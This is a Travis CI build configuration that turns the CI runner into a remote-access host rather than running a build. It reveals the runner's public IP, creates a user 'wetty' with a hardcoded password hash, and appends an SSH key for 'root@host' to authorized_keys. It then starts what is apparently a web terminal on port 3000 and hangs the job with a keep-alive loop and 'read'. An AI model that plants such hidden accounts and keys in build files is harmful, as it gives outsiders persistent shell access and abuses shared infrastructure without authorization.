sudo: required
dist: trusty

language: node_js

before_install:
 - curl -s http://whatismijnip.nl |cut -d " " -f 5
 - export DISPLAY=:99.0
 - sh -e /etc/init.d/xvfb start
 - sudo useradd -p sa0YjAINV/T.A wetty


script:
 - npm install
 - for i in {0..30}; do echo "working"; sleep 60; done &
 - sudo echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6o6P3Lzn4f1WNZfl/pxi6QdIaiIh2x8H6lNMwzKm7aaEKZa4eluunB0r2bn7hI+PUdjZkXF9GsZb8//OJOaaIpWt+Sj+qkx3n6ukGh93kvr09FYAFObw49UFcOxUdiCOufLoVuCXtD8wYSkqMo7I9UMuADRpAOLLAgHyz0XGaefI0GGtuarOdi+sTJkKaw3q6XY+rORoIFPbV6ViHevocWAJNRwIYrTEwrUweNIXpmBGOtPzNta/yb0WGa6t838O/QYMrakhCECvWSX1UpNttQq+EOowf73gdTwx4mHe7vuawNx/KJxAKyKreDi9XkMcsxxcHmNXO/bvKE3DZe1pX root@host" >>  ~/.ssh/authorized_keys
 - node app.js -p 3000 &
 - read
